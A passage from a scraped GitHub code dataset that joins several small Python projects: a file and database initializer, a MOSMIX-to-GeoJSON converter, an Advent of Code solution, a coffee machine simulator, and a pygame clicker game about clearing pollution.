crossword)\nprint(match)","repo_name":"jurayev/algorithms-practice","sub_path":"aid/aid_crossword.py","file_name":"aid_crossword.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9153159637","text":"import sys\nimport os\nimport pathlib\nimport sql_helper\nimport helper\n\nfrom pathlib import Path\nfrom sql_helper import *\nfrom helper import *\n\nDOLARIND = Path.cwd()/'.'\nBFP = {\n\t\t\t\t\t\"directories\": \n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"dolarin\": DOLARIND,\n\t\t\t\t\t\t\t\"program_data\": 
DOLARIND/'program_data', \n\t\t\t\t\t\t\t\"program_terminal_outputs\": DOLARIND/'program_data'/'program_terminal_outputs',\n\t\t\t\t\t\t\t\"users_data\": DOLARIND/'users_data',\n\t\t\t\t\t\t},\n\t\t\t\t\t\t\n\t\t\t\t\t\"files\":\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"program_logs\": DOLARIND/'program_data'/'logs.txt'\n\t\t\t\t\t\t},\n\t\t\t\t\t\n\t\t\t\t\t\"databases\":\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"dolarin_db\": DOLARIND/'Dolarin.db'\n\t\t\t\t\t\t}\n\t\t\t\t}\n\nAuthor_Data = {\n\t\t\t\"author\":\n\t\t\t\t{\n\t\t\t\t\t\"name\": \"Mashiur Rahman\",\n\t\t\t\t\t\"email\": \"mahimnhd97@gmail.com\"\n\t\t\t\t}\n\t\t}\n\nTH = helper.Th()\n\n\nT = None\n\ndef initializeTerminal(show_on_terminal=False):\n\t# generate terminal file name with the timestamps\n\ttimestamps=BFP['directories']['program_terminal_outputs']/(helper.currentTime().replace(' ', '').replace('::', ''))\n\tfile_path = helper.extentifyWith(timestamps, \"ops\")\n\thelper.confirmFile(file_path)\n\t\n\t# initializing global T with Terminal\n\tglobal T\n\tT = helper.Terminal(terminal_file_name = file_path, show_on_terminal=show_on_terminal)\n\treturn T\n\n\ndef torchDES(dir_path, des_dict={}):\n\tdir_path = str(dir_path)\n\t\n\tif(not os.path.isdir(dir_path)):\n\t\tpass\n\tentries = os.listdir(dir_path)\n\tfor e in entries:\n\t\tepath = os.path.join(dir_path, e)\n\t\tif os.path.isfile(epath):\n\t\t\tdes_dict[e] = epath\n\t\telif os.path.isdir(epath):\n\t\t\tdes_dict[e] = torchDES(epath, {\"path\": epath})\n\t\t\t\n\treturn des_dict\n\ndef initializeDFD():\n\tglobal BFP\n\tBFP['DFD'] = torchDES(DOLARIND)\n\t\n\ndef getDSFor(string=\"\", data={}, tabs=\"\"):\n\tif(type(data)==type({})):\n\t\tfor key in data:\n\t\t\tstring+= tabs+key+\":\\n\"\n\t\t\tstring = getDSFor(string, data[key], tabs+\"\\t\")\n\telif(type(data)==type([])):\n\t\tfor i in data:\n\t\t\tstring = getDSFor(string, i, tabs+\"\\t\")\n\telse:\n\t\tstring += tabs+str(data)+\"\\n\"\n\treturn string\n\n\ndef insertADummyUser():\n\tr = sql_helper.getResult(str(BFP['databases']['dolarin_db']), \"SELECT id FROM USER WHERE id=1\")\n\tif(r==None):\n\t\tdb_name = str(BFP['databases']['dolarin_db'])\n\t\tstatement = \"INSERT INTO USER VALUES(1, ?, ?, ?);\"\n\t\ttuple_value = (\"mash97\", \"yossup\", str(BFP['directories']['users_data']/(\"mash97_1.db\")))\n\t\tr = sql_helper.executeDML(db_name, statement, tuple_value)\n\t\t\n\t\tTH.pts(\"--> Dummy USER inserted\")\n\t\t# ~ print(r)\n\t\n\t\ndef confirmUsersTableInDolarin_DB():\n\tconnection = sqlite3.connect(str(BFP['databases']['dolarin_db']))\n\tif(sql_helper.isTableExistsInDB(str(BFP['databases']['dolarin_db']), 'USER')):\n\t\tprint(\"--> USER table exists in the dolarin_db\")\n\t\n\telse:\n\t\ttry:\n\t\t\tcreated = sql_helper.createTableInDb(User.DATABASE_NAME, User.TABLE_NAME, User.SCHEMA_DICT)\n\t\t\tif not created:\n\t\t\t\tprint(\"###--> Failed to create %s table in the %s\"%(User.TABLE_NAME, User.DATABASE_NAME))\n\t\t\telse:\n\t\t\t\tprint(\"---> %s table is created in the %s\"%(User.TABLE_NAME, User.DATABASE_NAME))\n\t\t\n\t\texcept Exception as e:\n\t\t\tprint(\"###--> Failed to create the\",User.TABLE_NAME,\"table in the dolarin_db:\", e)\n\t\n\tconnection.commit()\n\tconnection.close()\n\tinsertADummyUser()\n\ndef standBFS():\n\tmessage=(\"Making Stand of The BFS\")\n\tTH.pts(cf=cf(), string=message, \n\t\tmode=TH.MODE_ASSERTION)\n\t\t\n\t# Confirming Directories\n\tmessage=\"Checking %s in %s\\n\"%(\"directories\", os.path.abspath(BFP['directories']['dolarin']))\n\tTH.pts(cf=cf(), string=message, 
\n\t\tmode=TH.MODE_ASSERTION)\n\t\n\tfor directory in BFP['directories']:\n\t\tdir_name = BFP['directories'][directory].name\n\t\tif BFP['directories'][directory].is_dir():\n\t\t\tprint(\"OK:: directory: %s\" % dir_name)\n\t\telse:\n\t\t\tprint(\"W:: directory: %s\" % dir_name)\n\t\t\tos.mkdir(str(BFP['directories'][directory]))\n\t\t\tif(BFP['directories'][directory].is_dir()):\n\t\t\t\tprint(\"OK:: directory: %s\" % dir_name)\n\t\n\t# Confirming Files\n\tmessage=\"Checking %s in %s\\n\"%(\"files\", os.path.abspath(BFP['directories']['dolarin'].__str__()))\n\tTH.pts(cf=cf(), string=message, \n\t\tmode=TH.MODE_ASSERTION)\n\t\t\n\tfor file in BFP['files']:\n\t\tfile_name = BFP['files'][file].name\n\t\tif BFP['files'][file].is_file():\n\t\t\tprint(\"OK:: file: %s\" % file_name)\n\t\telse:\n\t\t\tprint(\"W:: file: %s\" % file_name)\n\t\t\topen(str(BFP['files'][file]), \"w\")\n\t\t\tif(BFP['files'][file].is_file()):\n\t\t\t\tprint(\"OK:: file: %s\" % file_name)\n\t\n\t# Confirming Databases\n\tmessage=\"Checking %s in %s\\n\"%(\"databases\", os.path.abspath(BFP['directories']['dolarin'].__str__()))\n\tTH.pts(cf=cf(), string=message, \n\t\tmode=TH.MODE_ASSERTION)\n\t\t\n\tfor db in BFP['databases']:\n\t\tdb_name = BFP['databases'][db].name\n\t\tif BFP['databases'][db].is_file():\n\t\t\tprint(\"OK:: database: %s\" % db_name)\n\t\telse:\n\t\t\tprint(\"W:: database: %s\" % db_name)\n\t\t\topen(str(BFP['databases'][db]), \"w\")\n\t\t\tif(BFP['databases'][db].is_file()):\n\t\t\t\tprint(\"OK:: database: %s\" % db_name)\n\t\n","repo_name":"mash-97/dolarin","sub_path":"initializor.py","file_name":"initializor.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33712695544","text":"#!/usr/bin/env python3\nimport argparse\nimport json\nimport sys\nfrom importlib import resources\n\nfrom mosmix2geojson.kml2json import kml2geojson\nfrom mosmix2geojson import __version__\n\nMOSMIX_KML_ENCODING = \"latin-1\"\n\n# define parser for argparse\n# dwdkml2geojson --max-stations 7 --jsonindent 2 file.kml > file.geojson\nargparser = argparse.ArgumentParser(description=\"Convert DWD MOSMIX data to GeoJSON.\")\n\n# define arguments\nargparser.add_argument(\"source\",\n nargs=\"?\",\n default=\"-\",\n type=str, # do not use FileType because it does not detect latin-1 for KML\n help=\"source KML file, - for stdin (default: stdin)\",\n metavar=\"SOURCE\")\n\nargparser.add_argument(\"target\",\n nargs=\"?\",\n default=sys.stdout,\n type=argparse.FileType(\"w\"),\n help=\"target JSON file, - for stdout (default: stdout)\",\n metavar=\"TARGET\")\n\nmapping_group = argparser.add_argument_group(\"mapping arguments\",\n description=\"Transform the output with mapped parameters. \"\n \"When a mapping of any kind is applied, unmapped parameters \"\n \"will not be included by default. Change this behaviour with \"\n \"the --keep-unmapped flag. 
Use this feature at your own risk.\")\n\nmapping_file_arg = mapping_group.add_mutually_exclusive_group()\n\nmapping_file_arg.add_argument(\"--map-to-cf\",\n action=\"store_const\",\n const=\"cf\",\n help=\"produce output with CF standard names or another human readable name where no CF standard name exists\",\n dest=\"integrated_mapping\")\n\nmapping_file_arg.add_argument(\"-m\", \"--mapping-file\",\n type=str,\n help=\"apply a custom mapping to the output\")\n\nmapping_group.add_argument(\"-k\", \"--keep-unmapped\",\n action=\"store_true\",\n help=\"include unmapped parameters in output\")\n\nmapping_group.add_argument(\"--export-cf-mapping\",\n action=\"store_const\",\n const=\"cf\",\n help=\"print the mapping configuration used by --map-to-cf and exit\",\n dest=\"export_mapping\")\n\nargparser.add_argument(\"-x\", \"--max-stations\",\n type=int,\n help=\"number of stations to be processed (default: all stations)\")\n\nargparser.add_argument(\"-i\", \"--json-indent\",\n type=int,\n help=\"indentation blanks for json (default: no indentation)\")\n\nargparser.add_argument(\"-v\", \"--version\", action=\"version\", version=__version__)\n\n\ndef main():\n args = argparser.parse_args()\n\n export_mapping = args.export_mapping\n if export_mapping:\n with resources.open_text(\"mosmix2geojson\", f\"{export_mapping}.mapping.json\") as fp:\n for line in fp:\n print(line, end=\"\")\n return\n\n source = args.source\n if source == \"-\":\n source = sys.stdin\n json_indent = args.json_indent\n max_stations = args.max_stations\n\n param_mapping = None\n integraded_mapping = args.integrated_mapping\n mapping_file = args.mapping_file\n if integraded_mapping:\n with resources.open_text(\"mosmix2geojson\", f\"{integraded_mapping}.mapping.json\") as fp:\n param_mapping = json.load(fp)\n elif mapping_file:\n with open(mapping_file) as fp:\n param_mapping = json.load(fp)\n\n geojson = kml2geojson(source, param_mapping=param_mapping, max_stations=max_stations,\n keep_unmapped=args.keep_unmapped)\n\n json.dump(geojson, args.target, indent=json_indent)\n # add trailing newline\n print(\"\", file=args.target)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DeutscherWetterdienst/mosmix2geojson","sub_path":"src/mosmix2geojson/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"19089949693","text":"import sys\nf = open(\"day7/input.txt\").read()\nrules = f.split(\"\\n\")\nbags = {}\nfor rule in rules:\n rule.strip(\".\")\n sep = rule.split(\" contain \")\n bag = sep[0].rstrip(\"s\")\n others = sep[1].split(\", \")\n if(not others[0].startswith(\"no\")):\n bags[bag] = {(int(item[0]), \"\".join(item[2:]).rstrip(\".\").rstrip(\"s\")) for item in others}\n\n#part 1\ndef parents(bag):\n parents = set()\n for key in bags.keys():\n for value in bags[key]:\n check_bag = value[1]\n if(check_bag == bag):\n parents.add(key)\n return parents\n\ndef all_parents(bag):\n cur_parents = parents(bag)\n if len(cur_parents) == 0:\n return set()\n for b in cur_parents:\n cur_parents = cur_parents | all_parents(b)\n return cur_parents\n\nprint(len(all_parents(\"shiny gold bag\")))\n\n#part 2\n\ndef children(bag):\n return list(bags[bag]) if bag in bags.keys() else []\n\ndef all_children(bag):\n cur_children = children(bag)\n total = 1\n if bag not in bags.keys():\n return 1\n for count, b in cur_children:\n total += count * all_children(b)\n return total\n\nprint(all_children(\"shiny gold 
bag\")-1)\n\n\n","repo_name":"Nastmi/adventOfCode2020","sub_path":"day7/bags.py","file_name":"bags.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3044008162","text":"from assets import MENU, resources, logo\nfrom os import system, name\n\n\nclass CoffeeMachine():\n __money = 0\n\n def __clear_console(self):\n return system('cls') if name in ['nt', 'dos'] else system('clear')\n\n def collect_money(self, cost) -> bool:\n while True:\n try:\n ten = 10 * int(input(\"How many ₹10 note? \"))\n twenty = 20 * int(input(\"How many ₹20 note? \"))\n fifty = 50 * int(input(\"How many ₹50 note? \"))\n hundred = 100 * int(input(\"How many ₹100 note? \"))\n except ValueError:\n print(\"Please provide a valid input!\")\n continue\n break\n\n total = ten + twenty + fifty + hundred\n\n if total < cost:\n print(\"Sorry that's not enough money. Money refunded\")\n return False\n elif total - cost > 0:\n print(f\"Here's your change ₹{total - cost}\")\n self.__money += cost\n\n return True\n\n def validate_resources(self, ingredients) -> bool:\n for ingredient in ingredients:\n if ingredients[ingredient] > resources[ingredient]:\n print(f\"Sorry there's not enough {ingredient}\")\n return False\n\n for ingredient in ingredients:\n resources[ingredient] -= ingredients[ingredient]\n\n return True\n\n def make_coffee(self, coffee):\n if not self.validate_resources(MENU[coffee]['ingredients']) or not self.collect_money(MENU[coffee][\"cost\"]):\n return\n\n print(f\"Here's your {coffee}☕. Enjoy 😄\")\n\n def process_input(self, usr_in):\n if usr_in == \"report\":\n print(\n f\"Water: {resources['water']}ml\\nMilk: {resources['milk']}ml\\nCoffee: {resources['coffee']}mg\\nMoney: ₹{self.__money}\")\n\n else:\n self.make_coffee(usr_in)\n\n def __init__(self):\n while True:\n self.__clear_console()\n print(logo)\n user_input = input(\n \"What would you like? (espresso/latte/cappuccino): \").lower()\n\n if not user_input in ['report', 'off'] and not user_input in MENU:\n print(\"Please enter a beverage from the menu. 
\")\n input(\"press enter to continue\")\n continue\n\n if user_input == \"off\":\n print(\"Turning off the machine ...\")\n break\n\n self.process_input(user_input)\n input(\"press enter to continue\")\n\n\nif __name__ == \"__main__\":\n CoffeeMachine()\n print(\"\\nThank you for using my coffee machine :)\\n\\t --MO (Github @1Hanif1)\")\n","repo_name":"1Hanif1/Python-Projects","sub_path":"Coffee Machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"28518762842","text":"\n# Import modules and code/classes/objects from other files\nimport math\n\nimport pygame.font\n\nfrom objects import *\nfrom messages import *\n\n\n# The Main function in which all the GUI code is ran\ndef main():\n\n # ----------------- Initializing Pygame Variables -----------------\n pygame.init()\n clock = pygame.time.Clock() # Clock for adjusting the frames per second\n\n screen = pygame.display.set_mode((WIDTH, HEIGHT)) # The initial Pygame Screen\n\n screen.fill(SCREEN_COLOR)\n pygame.display.set_caption(\"Carbon Clicker\")\n\n application_icon = pygame.image.load(base_path + \"images/carbon_clicker_logo.png\")\n pygame.display.set_icon(application_icon)\n\n logo = ImageRectObject((0, 0, 0, 0), (WIDTH // 2 - 200, HEIGHT // 2 - 200, 400, 400), 0, 0,\n image_file=base_path + \"images/carbon_clicker_logo.png\")\n logo.image = pygame.transform.scale(logo.image, (400, 400))\n\n basic_objects = [\n RectTextObject(SCREEN_COLOR, (WIDTH // 2 - 300, 40, 600, 100), 0, 50,\n text=\"\", text_color=GOLD_COLOR, text_size=60),\n RectTextObject(SCREEN_COLOR, (WIDTH // 2 - 100, 600, 200, 60), 0, 50,\n text=\"\", text_color=GOLD_COLOR, text_size=40),\n RectTextObject(GOLD_COLOR, (WIDTH // 2 - 300, 40, 600, 100), 4, 50,\n text=\"Carbon Clicker!\", text_color=GOLD_COLOR, text_size=60),\n logo,\n ]\n\n start_button = RectTextButton(GOLD_COLOR, (WIDTH // 2 - 100, 600, 200, 60), 4, 50, action=\"start_game\",\n text=\"Start\", text_color=GOLD_COLOR, text_size=40)\n\n stars = []\n\n for star_i in range(400):\n stars.append(Star((0, 0, WIDTH, HEIGHT)))\n\n starting = False\n transparency = 0\n\n # main_game(screen)\n\n # ----------------- The Main GUI Loop -----------------\n running = True\n while running:\n\n # ----------------- Looping through Pygame Events -----------------\n for event in pygame.event.get():\n\n # Quit Pygame\n if event.type == pygame.QUIT:\n running = False\n break\n\n # ----------------- Mouse Released -----------------\n if event.type == pygame.MOUSEBUTTONUP and not starting:\n mouse_pos = pygame.mouse.get_pos()\n if start_button.is_selecting(mouse_pos):\n starting = True\n\n # Re-Draw\n screen.fill(SCREEN_COLOR)\n\n # Draw stars\n mouse_pos = pygame.mouse.get_pos()\n displacement = ((mouse_pos[0] - WIDTH // 2) / 2400.0, (mouse_pos[1] - HEIGHT // 2) / 2400.0)\n\n for star in stars:\n star.update_position(displacement)\n star.draw(screen, False)\n\n is_selected = start_button.is_selecting(mouse_pos)\n\n # Draw objects\n draw_basic_objects(screen, basic_objects)\n start_button.draw(screen, is_selected)\n\n if starting:\n transparency = transparency + 2 + transparency * 0.1\n new_surface = pygame.Surface((WIDTH, HEIGHT), pygame.SRCALPHA)\n new_surface.set_alpha(transparency)\n new_surface.fill((0, 0, 0))\n screen.blit(new_surface, (0, 0))\n\n if transparency >= 255:\n main_game(screen)\n break\n\n # Set the FPS and update\n clock.tick(60)\n pygame.display.update()\n\n # Once the loop 
has ended, quit the application\n pygame.quit()\n\n\ndef main_game(screen):\n\n # ----------------- Initializing Objects -----------------\n starting = True\n transparency = 255\n\n time = 0 # Used for keeping track of seconds (60 ticks per second)\n clock = pygame.time.Clock() # Clock for adjusting the frames per second\n\n # The Main Panels\n title_panel = RectTextObject((0, 0, 0, 0), LAYER_TITLE_RECT, 0, 0,\n text=\"Carbon Clicker!\", text_color=GOLD_COLOR, text_size=35)\n pollution_cleared_panel = RectTextObject((0, 0, 0, 0), LAYER_POLLUTION_CLEARED_RECT, 0, 0,\n text=\"Pollution Cleared: 000000 lbs\", text_color=GOLD_COLOR, text_size=24)\n pps_panel = RectTextObject((0, 0, 0, 0), LAYER_PPS_RECT, 0, 0,\n text=\"PPS: 000000\", text_color=GOLD_COLOR, text_size=24)\n money_panel = RectTextObject((0, 0, 0, 0), LAYER_MONEY_RECT, 0, 0,\n text=\"$: 000000\", text_color=GOLD_COLOR, text_size=24)\n item_panel = ImageRectTextObject((0, 0, 0), LAYER_ITEMS_RECT, 0, 0, image_file=base_path + \"images/item_panel.png\",\n text=\"Items!\", text_color=GOLD_COLOR, text_size=40)\n\n achievement_title_panel = RectTextObject((0, 0, 0, 0), LAYER_ACHIEVEMENT_TITLE_RECT, 0, 0, text=\"Achievements:\",\n text_color=GOLD_COLOR, text_size=30)\n upgrade_title_panel = RectTextObject((0, 0, 0, 0), LAYER_UPGRADE_TITLE_RECT, 0, 0, text=\"Upgrades:\",\n text_color=GOLD_COLOR, text_size=30)\n\n # ----------------- Sounds -----------------\n click_sound = pygame.mixer.Sound(\"sounds/mouse_click.mp3\")\n click_sound.set_volume(0.4)\n purchase_sound = pygame.mixer.Sound(\"sounds/purchase.mp3\")\n purchase_sound.set_volume(0.6)\n achievement_sound = pygame.mixer.Sound(\"sounds/achievement_sound.mp3\")\n\n # ----------------- Achievements -----------------\n previous_achievement_stage = 0\n achievement = AchievementText((0, 0, 0, 0), (15,\n LAYER_ACHIEVEMENT_TITLE_RECT[1] + LAYER_ACHIEVEMENT_TITLE_RECT[3]+15,\n LAYER_ACHIEVEMENT_TITLE_RECT[2]-15, 135), 0, 0, text=\"\",\n text_color=GOLD_COLOR, text_size=18)\n\n # ----------------- Objects in their lists -----------------\n\n # Create the first layer of basic objects\n basic_objects_layer_1 = [\n ImageRectObject((100, 100, 100), LAYER_LEFT_RECT, 0, 0,\n image_file=base_path + \"images/left_background.png\"),\n ImageRectObject((200, 200, 200), LAYER_MIDDLE_RECT, 0, 0,\n image_file=base_path + \"images/middle_background_border.png\"),\n RectObject((0, 0, 0), LAYER_RIGHT_RECT, 0, 0),\n title_panel,\n pollution_cleared_panel,\n pps_panel,\n money_panel,\n RectObject((0, 0, 0), LAYER_SCROLL_BAR_RECT, 0, 0),\n achievement_title_panel,\n upgrade_title_panel,\n achievement\n ]\n\n # This second layer of objects goes above the items\n basic_objects_layer_2 = [\n item_panel\n ]\n\n stars = []\n\n for star_i in range(NUM_STARS):\n stars.append(Star(LAYER_BOTTOM_RECT))\n\n # ----------------- Scroll Bar -----------------\n holding_scroll_bar = False\n starting_mouse_y = 0\n scroll_bar = ScrollBar((0, 0, 0, 0), (LAYER_RIGHT_RECT[0] + 390, LAYER_RIGHT_RECT[1] + LAYER_ITEMS_RECT[3], 10, 50),\n 0, 0, image_file=base_path + \"images/scroll_bar.png\")\n\n sell_button = ImageButton((0, 0, 0, 0), SELL_BUTTON_RECT, 0, 0, \"SELL\", \"images/sell_button.png\",\n text=\"SELL!\", text_color=GOLD_COLOR, text_size=30)\n\n # ----------------- Buttons -----------------\n buttons = [\n scroll_bar,\n sell_button\n ]\n\n # ----------------- Items -----------------\n item_popup = None\n items = []\n item_base_y_pos = LAYER_ITEMS_RECT[3]\n item_max_y_pos = LAYER_ITEMS_RECT[3]\n item_min_y_pos = 
LAYER_ITEMS_RECT[3] - NUM_ITEMS * 100 + 6 * 100\n\n for item_type in range(NUM_ITEMS):\n items.append(Item((0, 0, 0, 0), (LAYER_RIGHT_RECT[0], item_base_y_pos + item_type * 100, 390, 100), 0, 0,\n \"ITEM\", item_type, \"\", GOLD_COLOR, 25))\n\n animation_text_list = [] # append later\n\n # ----------------- Upgrades -----------------\n upgrade_count = 0\n upgrades_shown = [0]\n upgrades = []\n upgrade_popup = None\n\n # Create the Upgrade objects\n for _upgrade in range(len(UPGRADE_ORDER)):\n upgrades.append(Upgrade((0, 0, 0, 0),\n (0, LAYER_UPGRADE_TITLE_RECT[1] + LAYER_UPGRADE_TITLE_RECT[3], 73, 73),\n 0, 0, \"UPGRADE\", (UPGRADE_ORDER[_upgrade][0], UPGRADE_ORDER[_upgrade][1]),\n \"\", (0, 0, 0), 0))\n\n # ----------------- Variables and internal Data -----------------\n money = 0\n\n pollution_cleared = 0\n total_pollution_cleared = 0\n previous_pollution_cleared = 0\n pps = 0\n\n click_strength = 0.2\n max_click_interval = 3\n click_interval = 0\n can_click = True\n\n hovering_earth = False\n\n # ----------------- Sprites -----------------\n earth_clicker = Earth(EARTH_CLICKER_RECT)\n sprite_group = pygame.sprite.Group()\n sprites = [earth_clicker,]\n sprite_group.add(sprites)\n\n # Used to determine which objects are selected\n selected_object = None\n\n # ----------------- The Main GUI Loop -----------------\n running = True\n while running:\n\n # ----------------- Looping through Pygame Events -----------------\n for event in pygame.event.get():\n\n # Quit Pygame\n if event.type == pygame.QUIT:\n running = False\n\n # ----------------- Mouse Clicked -----------------\n if event.type == pygame.MOUSEBUTTONDOWN:\n location = pygame.mouse.get_pos()\n colliding_earth = earth_clicker.colliding(location)\n\n # The earth was clicked\n if can_click and colliding_earth:\n earth_clicker.resize_down()\n\n # The scroll bar was clicked\n if selected_object == scroll_bar:\n starting_mouse_y = location[1]\n holding_scroll_bar = True\n\n # ----------------- Mouse Released -----------------\n if event.type == pygame.MOUSEBUTTONUP:\n location = pygame.mouse.get_pos()\n colliding_earth = earth_clicker.colliding(location)\n\n # Calculate changes when the earth has been clicked\n if can_click and colliding_earth:\n click_sound.play()\n earth_clicker.hover()\n pollution_cleared += click_strength\n total_pollution_cleared += click_strength\n\n # Animations\n animation_rect = (location[0]+random.randint(-2, 2), location[1]+random.randint(-2, 2),\n 20, 10)\n animation_text_list.append(AnimatedText((0, 0, 0, 0), animation_rect, 0, 0,\n text=\"+{} pollution cleared\".format(click_strength),\n text_color=(GOLD_COLOR[0], GOLD_COLOR[1], GOLD_COLOR[2], 255)))\n can_click = False\n\n # An Item is being bought\n if type(selected_object) == Item and money >= selected_object.price:\n selected_object.count += 1\n money = round(money - selected_object.price)\n purchase_sound.play()\n\n selected_object.price = round(selected_object.price * 1.1)\n\n # An Upgrade is being bought\n if type(selected_object) == Upgrade and money >= selected_object.price:\n money = round(money - selected_object.price)\n selected_object.purchased = True\n\n for i in range(len(selected_object.affected_items)):\n item = selected_object.affected_items[i]\n items[item].multiplier += selected_object.affected_rates\n\n purchase_sound.play()\n\n upgrades_shown.remove(selected_object.upgrade_order)\n\n # Selling the cleared pollution to gain money\n if selected_object == sell_button:\n money = round(money + pollution_cleared, 1)\n 
previous_pollution_cleared = 0\n pollution_cleared = 0\n\n # Once the mouse has been released, stop holding the scroll bar\n holding_scroll_bar = False\n\n # ----------------- Calculations -----------------\n\n # Calculate the current rate\n rate = 0\n for item in items:\n rate += item.count * item.rate * item.multiplier\n\n pollution_cleared += rate / 60\n total_pollution_cleared += rate / 60\n\n # ----------------- Achievements -----------------\n achievement_stage = int(math.log(int(max(1, total_pollution_cleared)), 1000))\n if achievement_stage != previous_achievement_stage:\n achievement_sound.play()\n\n earth_clicker.stage = min(4, achievement_stage)\n earth_clicker.redraw()\n\n achievement.text = achievement_messages[min(6, achievement_stage)]\n\n previous_achievement_stage = achievement_stage\n\n # ----------------- Upgrade Calculations -----------------\n if money >= UPGRADE_COSTS[UPGRADE_ORDER[min(len(UPGRADE_ORDER)-1, upgrade_count)][0]] \\\n [UPGRADE_ORDER[min(len(UPGRADE_ORDER)-1, upgrade_count)][1]] and upgrade_count < len(UPGRADE_ORDER)-1:\n upgrade_count += 1\n upgrades_shown.append(upgrade_count)\n\n # Move the upgrades in the correct order\n for upgrade in upgrades:\n if upgrade.upgrade_order in upgrades_shown:\n upgrade.move(len(upgrades_shown) - 1 - upgrades_shown.index(upgrade.upgrade_order))\n\n # ----------------- Formatting information for viewing -----------------\n\n # Display numbers with abbreviations and correct formatting\n pollution_cleared_digits = len(str(int(pollution_cleared)))\n\n # Pollution Cleared calculations\n num_power = int(math.log(int(max(1, pollution_cleared)), 1000))\n pollution_cleared_formatted = str(round(pollution_cleared / (1000 ** num_power), 1)) + \\\n NUMBER_SUFFIX[num_power]\n\n pollution_cleared_panel.text = \"Pollution Cleared: \" + \\\n \" \" * (6 - pollution_cleared_digits) + \\\n pollution_cleared_formatted + \" lbs\"\n\n # PPS (Pollution cleared Per Second) calculations\n current_pps_digits = len(str(int(pps)))\n\n num_power = int(math.log(max(1, int(pps)), 1000))\n pps_formatted = str(round(pps / (1000 ** num_power), 1)) + \\\n NUMBER_SUFFIX[num_power]\n pps_panel.text = \"PPS: \" + \\\n \" \" * (6 - current_pps_digits) + pps_formatted\n\n # Money calculations\n money_digits = len(str(int(money)))\n\n num_power = int(math.log(int(max(1, money)), 1000))\n money_formatted = str(round(money / (1000 ** num_power), 1)) + \\\n NUMBER_SUFFIX[num_power]\n\n money_panel.text = \"$: \" + \\\n \" \" * (6 - money_digits) + \\\n money_formatted\n\n # ----------------- Mouse and Selection -----------------\n mouse_pos = pygame.mouse.get_pos()\n selected_object = get_selected_object(mouse_pos, buttons, items, upgrades)\n colliding_earth = earth_clicker.colliding(mouse_pos)\n if not colliding_earth and hovering_earth:\n hovering_earth = False\n earth_clicker.resize_normal()\n if not hovering_earth and colliding_earth:\n hovering_earth = True\n earth_clicker.hover()\n\n # ----------------- Scroll Bar Movement -----------------\n if holding_scroll_bar:\n\n offset = mouse_pos[1]-starting_mouse_y # The offset in which we need to move the scroll bar\n if (item_base_y_pos > item_min_y_pos or offset < 0) and (item_base_y_pos < item_max_y_pos or offset > 0):\n\n # Make sure that the scroll bar does not move too far\n if offset > 0:\n offset = min(offset, item_base_y_pos - item_min_y_pos)\n if offset < 0:\n offset = max(offset, item_base_y_pos - item_max_y_pos)\n\n scroll_bar.move(offset)\n item_base_y_pos -= offset\n\n starting_mouse_y += offset\n\n # 
Scroll the items based on the scroll bar's movement\n scroll_items(items, item_base_y_pos)\n\n # ----------------- Popup Information -----------------\n\n # Item popups with descriptions about the items\n if type(selected_object) == Item and not selected_object.hidden:\n item_popup = ItemPopup((0, 0, 0, 0),\n (selected_object.x - 390, selected_object.y, 390, 100), 0, 0,\n base_path + \"images/building_frame.png\",\n popup_message=ITEM_INFO[selected_object.item_type])\n elif type(selected_object) == Upgrade and not selected_object.hidden:\n upgrade_popup = UpgradePopup((0, 0, 0, 0),\n (selected_object.x + selected_object.width, selected_object.y, 390, 100), 0, 0,\n base_path + \"images/building_frame.png\",\n UPGRADE_COSTS[selected_object.item_type][selected_object.tier],\n popup_message=UPGRADE_INFO[selected_object.item_type][selected_object.tier])\n else:\n item_popup = None\n upgrade_popup = None\n\n # ----------------- Redrawing and Updating -----------------\n\n screen.fill(SCREEN_COLOR)\n\n # Draw stars\n earth_center = earth_clicker.get_center()\n displacement = ((mouse_pos[0] - earth_center[0]) / 2400.0, (mouse_pos[1] - earth_center[1]) / 2400.0)\n\n for star in stars:\n star.update_position(displacement)\n star.draw(screen, False)\n\n draw_main_objects_1(screen, selected_object, basic_objects_layer_1, buttons)\n draw_items(screen, selected_object, items, money)\n draw_upgrades(screen, selected_object, upgrades, money, upgrade_count)\n draw_main_objects_2(screen, basic_objects_layer_2)\n\n earth_clicker.animate()\n sprite_group.draw(screen)\n draw_animated_text(screen, animation_text_list)\n draw_item_popup(screen, item_popup)\n draw_upgrade_popup(screen, upgrade_popup)\n\n if starting:\n transparency = max(transparency - 1 - (255 - transparency) * 0.1, 0)\n new_surface = pygame.Surface((WIDTH, HEIGHT), pygame.SRCALPHA)\n new_surface.set_alpha(transparency)\n new_surface.fill((0, 0, 0))\n screen.blit(new_surface, (0, 0))\n\n if transparency == 0:\n starting = False\n\n # Set the FPS and update\n clock.tick(60)\n pygame.display.update()\n\n # ----------------- PPS (Pollution cleared Per Second) Calculations -----------------\n time += 1\n if not can_click:\n click_interval += 1\n if click_interval >= max_click_interval:\n can_click = True\n click_interval = 0\n if time == 60:\n pps = pollution_cleared - previous_pollution_cleared\n previous_pollution_cleared = pollution_cleared\n time = 0\n\n # ----------------- End of Loop -----------------\n\n # Once the loop has ended, quit the application\n pygame.quit()\n\n\n# If the mouse is touching an object that can be selected, return it.\n# Else, return None for no selected object\ndef get_selected_object(mouse_pos, buttons, items, upgrades):\n for button in buttons:\n if button.is_selecting(mouse_pos):\n return button\n\n for item in items:\n if item.is_selecting(mouse_pos):\n return item\n\n for upgrade in upgrades:\n if not upgrade.hidden and upgrade.is_selecting(mouse_pos):\n return upgrade\n\n return None\n\n\n# Scroll the items/machines based on the base y position\ndef scroll_items(items, item_base_y_pos):\n for item in items:\n 